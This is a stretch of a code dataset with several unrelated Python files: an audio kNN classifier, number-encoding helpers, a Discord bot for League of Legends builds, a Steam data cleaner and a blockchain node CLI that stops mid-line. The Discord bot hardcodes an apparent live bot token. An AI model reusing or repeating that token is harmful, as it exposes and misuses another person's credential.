window_fn=kwargs['window_fn'],\n feature_fn=kwargs['feature_fn'], \n feature_range=kwargs[\"feature_range\"],\n decimate=kwargs[\"decimate\"],\n label=-1)\n \n \n print(\"Predicting...\")\n labels = knn.predict(features)\n return labels\n\ndef load_test_wave_labels(basename):\n # load the data from wavfile\n wave = load_wav(basename + \".wav\")\n labels = np.loadtxt(basename + \".labels\")\n return wave, labels\n\n\ndef plot_test(knn, parameters, fname):\n print(\"=\"*80)\n print(f\"Testing with {fname}\")\n wave, labels_true = load_test_wave_labels(fname)\n labels_pred = knn_classify(knn, wave, parameters)\n plot_test_classification(wave, labels_true, labels_pred)\n\ndef run_secret_test(knn, parameters):\n import secret_test\n classify = lambda wave: knn_classify(knn, wave, parameters)\n secret_test.challenge_evaluate_performance(classify)\n\ndef plot_test_classification(wave_data, labels_true, labels_predicted):\n ## plot the classification of wave_data (should be a 1D 8Khz audio wave)\n ## and two sets of labels: true and predicted. They do not need\n ## to be the same length, but they should represent equally-sampled\n ## sections of the wave file\n sr = 4096\n ts = np.arange(len(wave_data)) / float(sr)\n\n try:\n len(labels_true)\n except:\n labels_true = [labels_true]\n\n # make sure there are at least 2 predictions, so interpolation does not freak out\n if len(labels_predicted) == 1:\n labels_predicted = [labels_predicted[0], labels_predicted[0]]\n if len(labels_true) == 1:\n labels_true = [labels_true[0], labels_true[0]]\n\n # predict every 10ms\n frames = ts[::80]\n\n true_inter = scipy.interpolate.interp1d(\n np.linspace(0, np.max(ts), len(labels_true)), labels_true, kind=\"nearest\"\n )\n predicted_inter = scipy.interpolate.interp1d(\n np.linspace(0, np.max(ts), len(labels_predicted)),\n labels_predicted,\n kind=\"nearest\",\n )\n\n true_interpolated = true_inter(frames)[:, None]\n predicted_interpolated = predicted_inter(frames)[:, None]\n # show colorblocks for the labels\n plt.figure(figsize=(16, 4))\n plt.imshow(\n true_interpolated.T,\n extent=[0, np.max(ts), 0, 1],\n interpolation=\"nearest\",\n cmap=\"tab10\",\n vmin=0,\n vmax=10,\n )\n plt.imshow(\n predicted_interpolated.T,\n extent=[0, np.max(ts), 0, -1],\n interpolation=\"nearest\",\n cmap=\"tab10\",\n vmin=0,\n vmax=10,\n )\n\n # plot the wave\n plt.plot(ts, wave_data, c=\"w\", alpha=1)\n plt.text(0.5, 0.5, \"True\", color=\"w\")\n plt.text(0.5, -0.5, \"Predicted\", color=\"w\")\n plt.grid(\"off\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Amplitude\") \n\n print(f\"Prediction accuracy {sklearn.metrics.accuracy_score(true_interpolated, predicted_interpolated):.3f}\")\n print(\"Confusion matrix\")\n print(sklearn.metrics.confusion_matrix(true_interpolated, predicted_interpolated))\n print()","sub_path":"Case_study3/audio_task.py","file_name":"audio_task.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"190360683","text":"def b9876543210(valor): #Ok\n dec = int(valor/10)\n uni = valor%10\n if dec > 0:\n resultado = 10*'0' + 10*dec*'0'\n resultado = list(resultado)\n resultado[(-dec*10)-uni-1] = '1'\n resultado = ''.join(resultado)\n else:\n resultado = 10*'0'\n resultado = list(resultado)\n resultado[-uni-1] = '1'\n resultado = ''.join(resultado)\n\n return resultado\n\ndef bcd8642(valor): #Ok\n uni = valor%10\n uni = bin(uni)\n uni = uni[2:]\n dec = int(valor/10)\n\n if dec > 0:\n resultado = bin(dec) + ' ' + uni\n resultado = resultado[2:]\n else:\n resultado = uni\n\n return resultado\n\ndef aiken(valor):\n pass\n\ndef bcd8642v(valor):\n pass\n\ndef ibm(valor): #Ok\n uni = valor%10\n if uni == 0:\n uni = '1010'\n else:\n uni = bin(uni)\n uni = uni[2:]\n dec = int(valor/10)\n\n if dec > 0:\n resultado = bin(dec) + ' ' + uni\n resultado = resultado[2:]\n else:\n resultado = uni\n\n return resultado\n\ndef excesso3(valor): #Ok\n uni = valor%10\n uni = bin(uni)\n uni = bin(int(uni,2)+3)\n\n dec = int(valor/10)\n if dec > 0:\n dec = bin(dec)\n dec = bin(int(dec,2)+3)\n resultado = dec + ' ' + uni[2:]\n resultado = resultado\n else:\n resultado = uni\n\n return resultado[2:]\n\ndef gray(valor): #ok\n#https://www.youtube.com/watch?v=cF-Q5j7RUEw\n bin_ori = bin(valor)\n bin_ori = bin_ori[2:]\n resultado = []\n resultado.append(bin_ori[0])\n for i in range(len(bin_ori)-1):\n if bin_ori[i] == bin_ori[i+1]:\n resultado.append('0')\n else:\n resultado.append('1')\n resultado = ''.join(resultado)\n\n return resultado\n\n\ndef johnson(valor): #Ok\n if valor == 0: return '0'\n\n resultado = 50*'0'\n resultado = list(resultado)\n\n if valor <= 50:\n for i in range(valor):\n resultado[-i-1] = '1'\n else:\n dif = valor - 50\n for i in range(50):\n resultado[-i-1] = '1'\n for i in range(dif):\n resultado[-i-1] = '0'\n\n resultado = ''.join(resultado)\n\n return resultado\n\n#print(nome_da_funcao(valor))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"373472699","text":"from discord.ext import commands\nfrom riotwatcher import LolWatcher, ApiError\nfrom analyze_good import ChampionData, ChampionBuild\nfrom datadragontest import Canvas\nimport pandas as pd\nfrom discord import role\nimport discord\nimport os\nimport sys, getopt\n\nclient = commands.Bot(command_prefix=\".\", help_command=None)\nkr = pd.read_csv('KR_DATA.csv')\neuw1 = pd.read_csv('EUW1_DATA.csv')\nna1 = pd.read_csv('NA1_DATA.csv')\nresult = [kr, euw1, na1]\ndf = pd.concat(result)\nVERSION = '11.14.1'\n\nwith open('api_key.txt', 'r') as f:\n key = f.readlines()\n data_watcher = LolWatcher(key)\n\n\nclass Consult:\n def __init__(self, champion_id, role=None):\n self.champion_id = champion_id\n self.role = role\n #\n # def analyze(self):\n\n\nchampions = data_watcher.data_dragon.champions(version=VERSION)['data']\n\nchamp_maps = {\n 266: [\"Aatrox\", \"aatrox\", \"AATROX\", 'atrox', 'atroz'],\n 103: [\"Ahri\", \"ahri\", \"AHRI\", 'ari'],\n 84: [\"Akali\", \"akali\", \"AKALI\", 'akali'],\n 12: [\"Alistar\", \"alistar\", \"ALISTAR\", 'alitar'],\n 32: [\"Amumu\", \"amumu\", \"AMUMU\", 'ammumu', 'amumu'],\n 34: [\"Anivia\", \"anivia\", \"ANIVIA\"],\n 1: [\"Annie\", \"annie\", \"ANNIE\", 'anni', 'ani', 'any', 'anny'],\n 523: [\"Aphelios\", \"aphelios\", \"APHELIOS\", 'afelios', 'apelios', 'ap'],\n 22: [\"Ashe\", \"ashe\", \"ASHE\", 'ache', 'a'],\n 136: [\"AurelionSol\", \"aurelionsol\", \"AURELIONSOL\", 'aurelion', 'sol', 'aurelion sol'],\n 268: [\"Azir\", \"azir\", \"AZIR\", 'asir', 'asur'],\n 432: [\"Bard\", \"bard\", \"BARD\", 'bardo', ],\n 53: [\"Blitzcrank\", \"blitzcrank\", \"BLITZCRANK\", 'blitz', 'blizcrank', 'blitzcrank'],\n 63: [\"Brand\", \"brand\", \"BRAND\", 'bran'],\n 201: [\"Braum\", \"braum\", \"BRAUM\"],\n 51: [\"Caitlyn\", \"caitlyn\", \"CAITLYN\", 'cait', 'caitlin'],\n 164: [\"Camille\", \"camille\", \"CAMILLE\", 'camile'],\n 69: [\"Cassiopeia\", \"cassiopeia\", \"CASSIOPEIA\", 'cassio', 'casio', 'cass', 'cassiopeia'],\n 31: [\"Chogath\", \"chogath\", \"CHOGATH\", 'chogat', 'shogat', \"cho'gath\", \"chogat\", \"cho'gat\"],\n 42: [\"Corki\", \"corki\", \"CORKI\", 'korki', 'corki', 'corqui', 'korki', 'koki'],\n 122: [\"Darius\", \"darius\", \"DARIUS\"],\n 131: [\"Diana\", \"diana\", \"DIANA\"],\n 119: [\"Draven\", \"draven\", \"DRAVEN\", 'draiven', 'draven'],\n 36: [\"DrMundo\", \"drmundo\", \"DRMUNDO\", 'dr mundo', 'mundo', 'dr'],\n 245: [\"Ekko\", \"ekko\", \"EKKO\", 'eko', 'ecco', 'eco', 'ecum'],\n 60: [\"Elise\", \"elise\", \"ELISE\", 'elyse', 'elisse'],\n 28: [\"Evelynn\", \"evelynn\", \"EVELYNN\", 'evelin', 'evelinn', 'eve'],\n 81: [\"Ezreal\", \"ezreal\", \"EZREAL\", 'ez'],\n 9: [\"Fiddlesticks\", \"fiddlesticks\", \"FIDDLESTICKS\", 'fiddle', 'fiddlestics', 'fidlestics', 'fidlesticks', 'fidol'],\n 114: [\"Fiora\", \"fiora\", \"FIORA\"],\n 105: [\"Fizz\", \"fizz\", \"FIZZ\", 'fis', 'fiz'],\n 3: [\"Galio\", \"galio\", \"GALIO\", 'nopelien', 'galo'],\n 41: [\"Gangplank\", \"gangplank\", \"GANGPLANK\", 'gp', 'gankplanc', 'gankplanck', 'ganplan'],\n 86: [\"Garen\", \"garen\", \"GAREN\"],\n 150: [\"Gnar\", \"gnar\", \"GNAR\", 'nar', 'gnarr'],\n 79: [\"Gragas\", \"gragas\", \"GRAGAS\"],\n 104: [\"Graves\", \"graves\", \"GRAVES\"],\n 887: [\"Gwen\", \"gwen\", \"GWEN\", 'wen', ':v', 'wuen'],\n 120: [\"Hecarim\", \"hecarim\", \"HECARIM\", 'ecarim', 'eca', 'heca', 'jeca'],\n 74: [\"Heimerdinger\", \"heimerdinger\", \"HEIMERDINGER\", 'heimerdinger', 'heimer', 'heimmer', 'heimmendinger'],\n 420: [\"Illaoi\", \"illaoi\", \"ILLAOI\", 'illa', 'iyaoi'],\n 39: [\"Irelia\", \"irelia\", \"IRELIA\"],\n 427: [\"Ivern\", \"ivern\", \"IVERN\"],\n 40: [\"Janna\", \"janna\", \"JANNA\"],\n 59: [\"JarvanIV\", \"jarvaniv\", \"JARVANIV\", 'jarvan', 'jarvis', 'jarvan cuarto', 'jarban'],\n 24: [\"Jax\", \"jax\", \"JAX\", 'jac'],\n 126: [\"Jayce\", \"jayce\", \"JAYCE\", 'jaise', 'jayse'],\n 202: [\"Jhin\", \"jhin\", \"JHIN\", 'jin'],\n 222: [\"Jinx\", \"jinx\", \"JINX\", 'jix', 'jincs'],\n 145: [\"Kaisa\", \"kaisa\", \"KAISA\", \"kai'sa\", 'kai sa'],\n 429: [\"Kalista\", \"kalista\", \"KALISTA\"],\n 43: [\"Karma\", \"karma\", \"KARMA\"],\n 30: [\"Karthus\", \"karthus\", \"KARTHUS\", 'kartus', 'khartus'],\n 38: [\"Kassadin\", \"kassadin\", \"KASSADIN\", 'kasadin'],\n 55: [\"Katarina\", \"katarina\", \"KATARINA\", 'kata', 'cata'],\n 10: [\"Kayle\", \"kayle\", \"KAYLE\", 'kayle'],\n 141: [\"Kayn\", \"kayn\", \"KAYN\"],\n 85: [\"Kennen\", \"kennen\", \"KENNEN\"],\n 121: [\"Khazix\", \"khazix\", \"KHAZIX\", 'k6', 'ksix', 'six', 'khasics', 'kasix'],\n 203: [\"Kindred\", \"kindred\", \"KINDRED\", 'kindre'],\n 240: [\"Kled\", \"kled\", \"KLED\"],\n 96: [\"KogMaw\", \"kogmaw\", \"KOGMAW\", 'kogmau', 'komau', 'kog mau', 'kog'],\n 7: [\"Leblanc\", \"leblanc\", \"LEBLANC\", 'leblanc', 'leb', 'leb blank'],\n 64: [\"LeeSin\", \"leesin\", \"LEESIN\", 'lisin', 'lee', 'lee sin', 'sin'],\n 89: [\"Leona\", \"leona\", \"LEONA\"],\n 876: [\"Lillia\", \"lillia\", \"LILLIA\"],\n 127: [\"Lissandra\", \"lissandra\", \"LISSANDRA\", 'liss', 'lissandra'],\n 236: [\"Lucian\", \"lucian\", \"LUCIAN\"],\n 117: [\"Lulu\", \"lulu\", \"LULU\"],\n 99: [\"Lux\", \"lux\", \"LUX\"],\n 54: [\"Malphite\", \"malphite\", \"MALPHITE\", 'malpite', 'malfite', 'literalphite'],\n 90: [\"Malzahar\", \"malzahar\", \"MALZAHAR\"],\n 57: [\"Maokai\", \"maokai\", \"MAOKAI\"],\n 11: [\"MasterYi\", \"masteryi\", \"MASTERYI\"],\n 21: [\"MissFortune\", \"missfortune\", \"MISSFORTUNE\", 'miss', 'miss fortune', 'fortune'],\n 62: [\"MonkeyKing\", \"monkeyking\", \"MONKEYKING\", 'wukong', 'wu', 'wukong'],\n 82: [\"Mordekaiser\", \"mordekaiser\", \"MORDEKAISER\", 'mordecaiser'],\n 25: [\"Morgana\", \"morgana\", \"MORGANA\"],\n 267: [\"Nami\", \"nami\", \"NAMI\", 'namy'],\n 75: [\"Nasus\", \"nasus\", \"NASUS\"],\n 111: [\"Nautilus\", \"nautilus\", \"NAUTILUS\", 'nauti'],\n 518: [\"Neeko\", \"neeko\", \"NEEKO\", 'nico', 'niko', 'neeko'],\n 76: [\"Nidalee\", \"nidalee\", \"NIDALEE\", 'nidali'],\n 56: [\"Nocturne\", \"nocturne\", \"NOCTURNE\"],\n 20: [\"Nunu\", \"nunu\", \"NUNU\", 'nunu y willump'],\n 2: [\"Olaf\", \"olaf\", \"OLAF\"],\n 61: [\"Orianna\", \"orianna\", \"ORIANNA\"],\n 516: [\"Ornn\", \"ornn\", \"ORNN\"],\n 80: [\"Pantheon\", \"pantheon\", \"PANTHEON\"],\n 78: [\"Poppy\", \"poppy\", \"POPPY\"],\n 555: [\"Pyke\", \"pyke\", \"PYKE\"],\n 246: [\"Qiyana\", \"qiyana\", \"QIYANA\"],\n 133: [\"Quinn\", \"quinn\", \"QUINN\"],\n 497: [\"Rakan\", \"rakan\", \"RAKAN\"],\n 33: [\"Rammus\", \"rammus\", \"RAMMUS\", 'ramus'],\n 421: [\"RekSai\", \"reksai\", \"REKSAI\", 'rek sai', 'rek', 'sai'],\n 526: [\"Rell\", \"rell\", \"RELL\", 'rel'],\n 58: [\"Renekton\", \"renekton\", \"RENEKTON\", 'renek'],\n 107: [\"Rengar\", \"rengar\", \"RENGAR\"],\n 92: [\"Riven\", \"riven\", \"RIVEN\"],\n 68: [\"Rumble\", \"rumble\", \"RUMBLE\"],\n 13: [\"Ryze\", \"ryze\", \"RYZE\"],\n 360: [\"Samira\", \"samira\", \"SAMIRA\"],\n 113: [\"Sejuani\", \"sejuani\", \"SEJUANI\"],\n 235: [\"Senna\", \"senna\", \"SENNA\"],\n 147: [\"Seraphine\", \"seraphine\", \"SERAPHINE\"],\n 875: [\"Sett\", \"sett\", \"SETT\"],\n 35: [\"Shaco\", \"shaco\", \"SHACO\"],\n 98: [\"Shen\", \"shen\", \"SHEN\"],\n 102: [\"Shyvana\", \"shyvana\", \"SHYVANA\", 'shivana'],\n 27: [\"Singed\", \"singed\", \"SINGED\"],\n 14: [\"Sion\", \"sion\", \"SION\"],\n 15: [\"Sivir\", \"sivir\", \"SIVIR\"],\n 72: [\"Skarner\", \"skarner\", \"SKARNER\"],\n 37: [\"Sona\", \"sona\", \"SONA\"],\n 16: [\"Soraka\", \"soraka\", \"SORAKA\"],\n 50: [\"Swain\", \"swain\", \"SWAIN\"],\n 517: [\"Sylas\", \"sylas\", \"SYLAS\"],\n 134: [\"Syndra\", \"syndra\", \"SYNDRA\"],\n 223: [\"TahmKench\", \"tahmkench\", \"TAHMKENCH\", 'kench', 'kenc', 'quench', 'tham', 'tahm'],\n 163: [\"Taliyah\", \"taliyah\", \"TALIYAH\"],\n 91: [\"Talon\", \"talon\", \"TALON\"],\n 44: [\"Taric\", \"taric\", \"TARIC\"],\n 17: [\"Teemo\", \"teemo\", \"TEEMO\"],\n 412: [\"Thresh\", \"thresh\", \"THRESH\"],\n 18: [\"Tristana\", \"tristana\", \"TRISTANA\"],\n 48: [\"Trundle\", \"trundle\", \"TRUNDLE\"],\n 23: [\"Tryndamere\", \"tryndamere\", \"TRYNDAMERE\"],\n 4: [\"TwistedFate\", \"twistedfate\", \"TWISTEDFATE\"],\n 29: [\"Twitch\", \"twitch\", \"TWITCH\"],\n 77: [\"Udyr\", \"udyr\", \"UDYR\"],\n 6: [\"Urgot\", \"urgot\", \"URGOT\"],\n 110: [\"Varus\", \"varus\", \"VARUS\"],\n 67: [\"Vayne\", \"vayne\", \"VAYNE\"],\n 45: [\"Veigar\", \"veigar\", \"VEIGAR\"],\n 161: [\"Velkoz\", \"velkoz\", \"VELKOZ\", 'vel'],\n 254: [\"Vi\", \"vi\", \"VI\"],\n 234: [\"Viego\", \"viego\", \"VIEGO\"],\n 112: [\"Viktor\", \"viktor\", \"VIKTOR\"],\n 8: [\"Vladimir\", \"vladimir\", \"VLADIMIR\"],\n 106: [\"Volibear\", \"volibear\", \"VOLIBEAR\"],\n 19: [\"Warwick\", \"warwick\", \"WARWICK\"],\n 498: [\"Xayah\", \"xayah\", \"XAYAH\"],\n 101: [\"Xerath\", \"xerath\", \"XERATH\"],\n 5: [\"XinZhao\", \"xinzhao\", \"XINZHAO\"],\n 157: [\"Yasuo\", \"yasuo\", \"YASUO\"],\n 777: [\"Yone\", \"yone\", \"YONE\"],\n 83: [\"Yorick\", \"yorick\", \"YORICK\"],\n 350: [\"Yuumi\", \"yuumi\", \"YUUMI\"],\n 154: [\"Zac\", \"zac\", \"ZAC\"],\n 238: [\"Zed\", \"zed\", \"ZED\"],\n 115: [\"Ziggs\", \"ziggs\", \"ZIGGS\"],\n 26: [\"Zilean\", \"zilean\", \"ZILEAN\"],\n 142: [\"Zoe\", \"zoe\", \"ZOE\"],\n 143: [\"Zyra\", \"zyra\", \"ZYRA\"],\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\nrole_map = {\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\n\n\n@client.event\nasync def on_ready():\n print('bot ready')\n\n\nclass Consult:\n def __init__(self, champion, role=None):\n self.champion = champion\n self.role = role\n matches = ChampionData(df)\n champion_matches = matches.champion_data(self.champion, self.role)\n champion = ChampionBuild(champion_matches)\n self.mythic, self.core, self.final, self.starter, self.boots, self.primary_runes, self.secondary_runes, self.spell1, self.spell2, self.champion_name = champion.get_all_data()\n\n def make_all_info(self):\n if self.role is None:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image()\n else:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image(self.role)\n\n\ndef check_img(champion, rol=None):\n if rol is None:\n file = 'all_info/popular_' + str(champion) + \".png\"\n if os.path.isfile(file):\n return file\n else:\n kayn = Consult(champion)\n kayn.make_all_info()\n return file\n\n else:\n file = 'all_info/popular_' + str(champion) + '_' + rol + \".png\"\n if os.path.isfile(file):\n return file\n else:\n kindred = Consult(champion, rol)\n kindred.make_all_info()\n return file\n\n\n@client.command(aliases=['allinfo', 'AllInfo'])\nasync def ai(ctx, champion, aux=None, aux1=None):\n # this if aux is None, then this is only the champ, with popular role\n champion = champion.lower()\n if aux is None:\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n file = check_img(champion, aux)\n await ctx.send(file=discord.File(file))\n break\n print(champion)\n # there are 3 possible options\n # 1. aux is role, then aux1 is None and this means one word champ and its role\n # 2. aux is second word of champ, and aux1 is none, then is a 2 word champs with popular role\n # 3. aux is second word champ and aux1 is its role, thus is a 2 word champ with is specific role\n elif aux is not None and aux1 is None: # this means either opcion 1 or 2\n aux = aux.lower()\n\n for value in champ_maps.values():\n if aux in value:\n aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n if aux in role_map.keys():\n # thi means that is option 1\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n break\n file = check_img(champion, aux)\n await ctx.send(file=discord.File(file))\n elif type(aux) is int:\n # this means that is option 2\n file = check_img(aux)\n await ctx.send(file=discord.File(file))\n print(champion)\n\n if aux is not None and aux1 is not None:\n # this means option 3, thus we will\n\n print('option3')\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n break\n\n for value in champ_maps.values():\n if aux in value:\n aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n for value in champ_maps.values():\n if aux1 in value:\n aux1 = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n if type(champion) is int and aux1 in role_map.keys():\n print('make consult with champion and aux1')\n file = check_img(champion, aux1)\n print(file)\n await ctx.send(file=discord.File(file))\n elif type(aux) is int and aux1 in role_map.keys():\n print('make consult with aux and aux1')\n file = check_img(aux, aux1)\n await ctx.send(file=discord.File(file))\n\n\nclient.run('ODQ3NDQ3ODQxMjM2MzIwMjU3.YK-NTg.8tuP_8K9qmRmC9kelmZ-Qiqwg2Y')\n","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":13528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"163166466","text":"import re\n\n\ndef game_genre_category(game_data):\n\t\"\"\"\n\t\tArgs:\n\t\t\tgame_data: Scraped steam game data as dictionary\n\t\tReturn:\n\t\t\tAll game genres and categories.\n\t\"\"\"\n\ttry:\n\t\tgenres = game_data['genres']\n\texcept KeyError:\n\t\tgenres = []\n\n\ttry:\n\t\tcategories = game_data['categories']\n\texcept KeyError:\n\t\tcategories = []\n\n\tgame_themes = genres + categories\n\tif game_themes:\n\t\tget_themes = [theme['description'] for theme in game_themes]\n\t\tjoin_themes = ', '.join(get_themes)\n\t\treturn join_themes\n\treturn ''\n\n\ndef steam_minimum_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game minimum requirements\n\t\"\"\"\n\ttry:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall(\"OS:(.*?)\", raw_min)\n\t\tif not find_min:\n\t\t\tfind_min = re.findall(\"OS(.*?)\", raw_min)\n\t\t\tif not find_min:\n\t\t\t\tfind_min = re.findall(':(.*?)', raw_min + '')\n\t\trequirements = '- OS:' + find_min[0] + \"
\"\n\n\t\treturn requirements\n\n\texcept:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall('', raw_min)\n\t\treplace_min = '' + find_min[0].replace(' class=\"bb_ul\">', '') + '
'\n\t\trequirements = replace_min\n\n\t\treturn requirements\n\n\ndef steam_max_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game maximum requirements\n\t\"\"\"\n\ttry:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + '
'\n\t\tfind_max = re.findall(\"OS:(.*?)\", raw_max)\n\t\tif not find_max:\n\t\t\tfind_max = re.findall(\"OS(.*?)\", raw_max)\n\t\t\tif not find_max:\n\t\t\t\tfind_max = re.findall(':(.*?)', raw_max + '')\n\t\tmax_req = '- OS:' + find_max[0] + \"
\"\n\n\t\treturn max_req\n\n\texcept:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + ''\n\t\tfind_max = re.findall('', raw_max)\n\t\treplace_max = '' + find_max[0].replace(' class=\"bb_ul\">', '') \n\t\tmax_req = replace_max\n\n\t\treturn max_req\n\n\ndef game_file_size(raw_requirement):\n\t\"\"\"\n\t\tReturn : Use and convert file size to G (Gigabytes).\n\t\"\"\"\n\tstring_gigabytes = ['hard drive', 'storage', 'hdd', 'hard disk', 'disk space']\n\tif raw_requirement:\n\t\tsplit_requirement = raw_requirement.split('')\n\t\tfor requirement in split_requirement:\n\t\t\trequirement = requirement.lower().replace('+', '').replace('at least', '')\n\t\t\tfor size in string_gigabytes:\n\t\t\t\tif size in requirement and 'gb' in requirement:\n\t\t\t\t\trequired_space = re.findall(r'\\d+', requirement)\n\t\t\t\t\tspace = float('.'.join(required_space))\n\t\t\t\t\treturn space * 1000\n\n\t\t\t\tif size in requirement and 'mb' in requirement:\n\t\t\t\t\trequired_space = re.findall(r'\\d+', requirement)\n\t\t\t\t\tspace = float('.'.join(required_space))\n\t\t\t\t\treturn space * 1\n\treturn 0\n","sub_path":"steam_data_cleaner.py","file_name":"steam_data_cleaner.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"584473288","text":"import click\nfrom rrc.main.node import Node\nfrom rrc.main.networking import Networking\nfrom rrc.main.computing import Computing\nfrom rrc.main.storing import *\nimport getpass\nimport docker\nfrom . import *\nfrom rrc import __version__ as _version\nfrom rrc import _debug as _debug\n\n@click.group()\ndef cmd():\n pass\n\n@cmd.command()\n@click.option('--file', default=None, help=\"Compute the SHA256 digest of a file.\")\ndef digest(file):\n if file:\n print(\"SHA-256 digest: {0}\".format(sha256_digest(file)))\n\n@cmd.command()\ndef version():\n print(\"RRC version {0} in use.\".format(_version))\n\n@cmd.command()\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\n@click.option('--clean/--no-clean', default=None, help=\"Delete all the blocks.\")\ndef block(debug, clean): # show the lask block in the blockchain for now.\n if debug:\n _debug = True\n\n storing = Storing()\n networking = Networking()\n computing = Computing()\n networking.link_storage(storing)\n computing.link_storage(storing)\n net_pub = networking.network_pub()\n\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n if current_node and not current_node.localhost:\n networking.connect()\n storing.connect()\n storing.release(\"Node\")\n\n # To hide for production.\n # Never allow this even in localhost dev test.\n if clean:\n sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n if sure.lower() == \"y\":\n session = storing.hook(\"Node\")\n blks = session.query(Block).all()\n for blk in blks:\n session.delete(blk)\n session.commit()\n storing.release(\"Node\")\n xprint(\"Node\", \"warn\", \"All Blocks removed.\")\n elif sure.lower() == \"n\":\n xprint('Node', 'warn', 'Well understood. Cheers!')\n else:\n xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o.')\n else:\n storing = Storing()\n networking = Networking()\n computing = Computing()\n networking.link_storage(storing)\n computing.link_storage(storing)\n net_pub = networking.network_pub()\n\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n if current_node and not current_node.localhost:\n networking.connect()\n storing.connect()\n storing.release(\"Node\")\n\n if networking.connected():\n xprint(\"Node\", \"warn\", \"Warning: We do not support showing the last block from the network for now.\")\n else:\n session = storing.hook(\"Node\")\n last_blk = session.query(Block).filter(Block.last == True).first()\n if last_blk:\n xprint(\"Node\", \"inf\", \"Last Block: \\n{0}\".format(last_blk))\n else:\n xprint(\"Node\", \"inf\", \"The blockchain is currently empty.\")\n storing.release(\"Node\")\n\n# add a clean up command to wipe the .lock just in case something is messed up.\n# Also in exceptions try to always release the lock.\n# Finally for forced terminations, make sure to place a callback to cleanup the lock.\n@cmd.command()\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef unlock(debug):\n if debug:\n _debug = True\n xprint('Node', 'deb', 'Entering the cli unlock command...')\n xprint('Node', 'tip', 'Only do this when one component did not release the storing lock properly.')\n xprint('Node', 'tip', 'The current deadlock is preventing the whole node to run properly.')\n xprint('Node', 'warn', 'Warning: This will force the removal of the current lock on storing.')\n xprint('Node', 'warn', 'Warning: Doing this can cause non-reversible arm to your storage integrity.')\n xprint('Node', 'warn', 'Warning: Ensure that no component is actively using the current lock.')\n sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n if sure.lower() == \"y\":\n storing = Storing()\n storing.unlock()\n elif sure.lower() == \"n\":\n xprint('Node', 'warn', 'Well understood. Cheers!')\n else:\n xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o.')\n\n\n@cmd.command()\n# Summary of the network:\n# - Check that we can connect to it.\n# - Show a map of the network nodes. Total, By continent, by country.\n# - Show the number of computations ran so far.\n# - Show the amount of rewards generated so far.\n# - Show the price of a reward.\n# - Says if the current node is connected or disconnected from the network.\n# - Says what is the state of current node: Behind the network, synching or up to date.\n@click.option('--summary/--no-summary', default=None, help=\"The summary of the RRC network.\")\n@click.option('--price/--no-price', default=None, help=\"The current price of 1 RRC in different exchanges.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef network(summary, price, debug):\n if debug:\n _debug = True\n xprint('Node', 'deb', 'Entering the cli network command...')\n storing = Storing()\n networking = Networking()\n\n net_pub = networking.network_pub()\n if net_pub:\n storing.network_pub(net_pub)\n else:\n xprint('Node', 'err', 'Error: Cannot reach the RRC network.')\n xprint('Node', 'warn', 'Warning: Requests to the network will most likely fail.')\n xprint('Node', 'inf', 'Tip: Please check that you have a reliable internet connexion.')\n return\n\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n storing.release(\"Node\")\n if current_node is None:\n xprint('Node', 'err', 'Error: You must configure the node before using this command features.')\n xprint('Node', 'inf', 'Tip: rrc node --config')\n return\n else:\n if summary:\n response = networking.network_summary()\n if response:\n xprint('Node', 'deb', ' Network summary\\n')\n xprint(json.dumps(response, sort_keys=True, indent=4))\n\n if price:\n response = networking.network_price()\n if response:\n xprint('Node', 'deb', 'RRC Network >> Price\\n')\n xprint(json.dumps(response, sort_keys=True, indent=4))\n\n@cmd.command()\n@click.option('--setup/--no-setup', default=None, help=\"Setup the node 